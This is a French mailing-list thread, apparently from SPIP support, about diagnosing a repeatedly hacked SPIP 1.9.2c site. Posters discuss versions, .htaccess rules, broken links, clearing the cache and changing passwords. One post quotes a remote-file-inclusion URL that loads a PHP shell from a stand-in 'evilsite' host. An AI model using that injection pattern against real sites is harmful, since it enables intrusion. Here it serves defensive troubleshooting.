Site hacke

Hello

Il y a quelques temps j'avais parle d'un site qui avait ete hacke et j'avais demande si ca pouvait etre la faute de SPIP. Je savais que non mais je voulai m'assurer.

Ce site a de nouveau subi une attaque hier et voici ce que l'hebergeur a dit:
"The script you're using, SPIP, is very vulnerable to attack. It looks
like the attacker was able to inject a C99 PHP shell into your
database as I cannot actually find it on the server. I've updated
your .htaccess with some more strict security checks and the attacks
are now stopped.
Please go through this account's database to remove these fake entries
and this should fix the issue."

Je n'arrive pas a rentre dans la base de donnees, mais le contenu est toujours la (articles, rubriques, breves).
Dans la partie privee, les sous menus des menus principaux (Edition, auteurs, Stat, configuration...) n'apparaissent pas. Les balises <multi> sur les auteurs ne marchent pas.

Quelqu'un a une idee?

Merci

George

george@diwanalarab.com a écrit :

Hello

Il y a quelques temps j'avais parle d'un site qui avait ete hacke et j'avais demande si ca pouvait etre la faute de SPIP. Je savais que non mais je voulai m'assurer.

quelle version de Spip ?

il faut etre en 1.8.3a, 1.9.2c, 1.9.2d ou SVN (recentes)
les autres ont effectivement des failles de securité.

Ce site a de nouveau subi une attaque hier et voici ce que l'hebergeur a dit:
"The script you're using, SPIP, is very vulnerable to attack. It looks
like the attacker was able to inject a C99 PHP shell

ca c'est ce qu'on a trouvé dans les 1.8.2

  into your

database

SQL ionjection, c'est la derniere faille trouvée.
mais injection de PHP dans SQL ???
bizarre.
meme si c'etait le cas, les balises Spip ne le laisseraient pas s'executer (sauf [(#BALISE**)])

as I cannot actually find it on the server. I've updated

your .htaccess with some more strict security checks and the attacks
are now stopped.

interessant, est-il passible d'avoir le fameux .htaccess ?

@++

george@diwanalarab.com wrote:

Ce site a de nouveau subi une attaque hier et voici ce que l'hebergeur a dit:
"The script you're using, SPIP, is very vulnerable to attack.
Quelqu'un a une idee?

???

tu t'imagines bien qu'il est *impossible* de te répondre au vu des infos que tu donnes...

quel type d'attaque ?

version spip ?
plugins ?
modifs perso, js perso, ... ?
droits des répertoires ?
version php ?
phpinfo() ?
version mysql ?

tu dis ne plus avoir accès à ta base de données.
que dit phpmyadmin (ou l'interface spécifique d'accès) ?
conserve tu un accès ftp ?

quelles modifs ton hébergeur a-t-il apportées au .htaccess ?

depuis la dernière 'attaque' les login/pass ont-ils été modifiés ?
quels sont les intervenants (rédacteurs/administrateurs) qui ont accès au site ?
les visiteurs doivent-ils se logguer ?

une url ?

Pardon
J'ai oublie de mentionner tout ca parce que c'etait dans l'ancien thread et j'avais l'impression que je les avais mis:

il s'agit de SPIP 1.9.2c

plugins:
Barre typo enrichie (un peu vielle)
boutions texte
corbeille

PHP 4.4.4

MySQL 4.1.22

et voici ce qu'il ya dans .htaccess a la racine du site:

SecFilterEngine on
RewriteEngine on

RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^forum/?$ http://forum.3almani.org [R=302,L]

pour arriver au site il faut l'url:
http://www.3almani.org/spip.php?sommaire
car le fichier index.php a ete hacke et on l'a remplace maintenant par un message qui parle de maintenance.

George

Quoting denisb <denisb@laposte.net>:

george@diwanalarab.com wrote:

Ce site a de nouveau subi une attaque hier et voici ce que l'hebergeur a dit:
"The script you're using, SPIP, is very vulnerable to attack.
Quelqu'un a une idee?

???

tu t'imagines bien qu'il est *impossible* de te répondre au vu des infos
que tu donnes...

quel type d'attaque ?

version spip ?
plugins ?
modifs perso, js perso, ... ?
droits des répertoires ?
version php ?
phpinfo() ?
version mysql ?

tu dis ne plus avoir accès à ta base de données.
que dit phpmyadmin (ou l'interface spécifique d'accès) ?
conserve tu un accès ftp ?

quelles modifs ton hébergeur a-t-il apportées au .htaccess ?

depuis la dernière 'attaque' les login/pass ont-ils été modifiés ?
quels sont les intervenants (rédacteurs/administrateurs) qui ont accès
au site ?
les visiteurs doivent-ils se logguer ?

une url ?

george@diwanalarab.com wrote:

Pardon
J'ai oublie de mentionner tout ca parce que c'etait dans l'ancien thread et j'avais l'impression que je les avais mis:

hummm.
phpbb était-il 'fonctionnel' au moment de l'attaque ?

Je ne gere pas le serveur ni le forum mais je sais que le forum se trouve sur un autre serveur.
Il etait sur le meme serveur lors de la premiere attaque et je sais qu'il a ete deplace depuis.

George

Quoting denisb <denisb@laposte.net>:

george@diwanalarab.com wrote:

Pardon
J'ai oublie de mentionner tout ca parce que c'etait dans l'ancien
thread et j'avais l'impression que je les avais mis:

hummm.
phpbb était-il 'fonctionnel' au moment de l'attaque ?

Je vien de m'apercevoir dun probleme qui pourrait etre a la base du piratage (d'ailleurs j'allais le poser a la liste mais je n'ai pas eu le temps):

Il y a quelques pages sur le site qui sont ajoutees en dehors des fichiers qu'on trouve dans dist: about.html, team.html etc...
les liens vers ces pages etaient normal: #URL_PAGE{about} etc.

Apres un certain temps ces liens ne donnaient plus l'adresse attendue:
spip.php?page=about
mais quelque chose du genre:
spip.php/local/cache-vignettes/L250xH126/squelettes/squelettes/spip.php?page=about
et tous les CSS etaient perdues.
J'ai du changer enlever #URL_PAGE et mettre spip.php?page=about dans le lein.

Est ce que ca pourrait etre une piste?

J'ai lu aussi q'un PHP shell peut etre introduit de la facon suivante:
www.mysite.com/index.php?page=www.evilsite.com/shell.txt?

George

Quoting george@diwanalarab.com:

Je ne gere pas le serveur ni le forum mais je sais que le forum se
trouve sur un autre serveur.
Il etait sur le meme serveur lors de la premiere attaque et je sais
qu'il a ete deplace depuis.

George

Quoting denisb <denisb@laposte.net>:

george@diwanalarab.com wrote:

Pardon
J'ai oublie de mentionner tout ca parce que c'etait dans l'ancien
thread et j'avais l'impression que je les avais mis:

hummm.
phpbb était-il 'fonctionnel' au moment de l'attaque ?

Est-ce que le phpBB as été completement retiré ou simplement désactivé ?

george@diwanalarab.com a écrit :

il s'agit de SPIP 1.9.2c

il n'y a pas de faille connue dans cette version.
Donc soit il y en a une et il faut la decouvrir, soit le probleme est ailleurs

plugins:
Barre typo enrichie (un peu vielle)
boutions texte
corbeille

je ne pense pas qu'il y ait de probleme avec ces plugins.

PHP 4.4.4

il me semble qu'il y a des failles de securité sur cette version, PHP pourrait etre lui meme la cause... mais c'est peu probable (j'ai rien d'utilisable avec Spip, mais je ne suis pas expert en securité...)

MySQL 4.1.22

et voici ce qu'il ya dans .htaccess a la racine du site:

SecFilterEngine on
RewriteEngine on

RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^forum/?$ http://forum.3almani.org [R=302,L]

je parlais du .htaccess ajouté pour securiser le site.
Tant que tu y es, il faudrait demander aussi ce qui lui fait dire que l'attaque est passée par Spip à ton hebergeur (je suppose qu'il a vu un log louche pour en conclure que l'attaque avait exploité une faille dans Spip)

pour arriver au site il faut l'url:
http://www.3almani.org/spip.php?sommaire
car le fichier index.php a ete hacke et on l'a remplace maintenant par un message qui parle de maintenance.

Dans ce genre de cas, il y a en general 9 chances sur 10 pour que ca soit un mot de passe serveur qui ait été cassé (FTP ? SSH ?)
Est-ce que les mots de passes sont sécurisés (>8 caracteres avec lettres et chiffres chiffres..) ?
Ont-ils été changés après chaque attaque ?

Je suis pas convaincu que Spip soit en cause sur le coup, mais je suis convaincu qu'il y a des failles de securité dans Spip (en fait, je dirais qu'il y a peu de chances pour qu'il n'y en est pas), donc ca me parait important de creuser un peu.

@+

george@diwanalarab.com wrote:

il s'agit de SPIP 1.9.2c

ok

Barre typo enrichie (un peu vielle)
boutions texte
corbeille

ok

PHP 4.4.4

ok

MySQL 4.1.22

ok

SecFilterEngine on

ça c'est la mise en oeuvre du ModSecurity de Apache (filtrage POST, cookies...). ça risque de faire remonter des erreurs 500...

RewriteRule ^forum/?$ http://forum.3almani.org [R=302,L]

forum transféré donc

le fichier index.php a ete hacke

si ce n'est pas indiscret, index.php a donc été remplacé par un autre index.php qui faisait quoi ?
vous en avez gardé une copie ?

Ce site a de nouveau subi une attaque hier

la précédente était-elle celle de 2006 quand votre hébergeur s'est fait hacker quelques centaines de ses hébergements par un défaut dans son interface d'administration ?

l'hebergeur a dit:
"The script you're using, SPIP, is very vulnerable to attack.

tiens donc.
il n'y a que votre site qui a subit l'attaque cette fois-ci ?
il faudrait demander au crocodile quelles sont ces very vulnérabilités...
il a des log votre hébergeur.

cela dit, spip n'est pas exempt de bug, ni de faille... à venir :
entre l'utilisation des plugins, les possibilités d'appel à des sites distants, l'incroyable imagination des utilisateurs... il y a de quoi s'attendre à ce que ça finisse bien par arriver.

> Apres un certain temps ces liens ne donnaient plus l'adresse attendue:
> spip.php?page=about
> mais quelque chose du genre:
> spip.php/local/cache-vignettes/L250xH126/squelettes/squelettes/spip.php?page=about
ah ça, ça ressemble à une (mauvaise) construction de liens faisant intervenir #SELF et 'bouclant' sur elle-même ou encore à une construction en javascript (un location.href malvenu).

quoique... ah non, c'es un lien bizarrement traduit :
construction dans inc-pied.html avec <a href="#URL_PAGE{backend}"
mais traduit dans http://www.3almani.org/?page=forum par
<a href="http://www.3almani.org/index.php/squelettes/local/
cache-css/squelettes/forum/forum/IMG/doc/spip.php?page=backend"

et idem pour #URL_PAGE{plan}
voilà qui est surprenant...
...
ah ouais ok dac...

*vider le cache !*

cela étant dit, 'hostgatruc' et securité (en quelques clics de recherche) ça ne me semble pas vraiment folichon...

et, tout comme stephane, je réitère mon conseil :
modifier les login/pass (spip ET cpanel)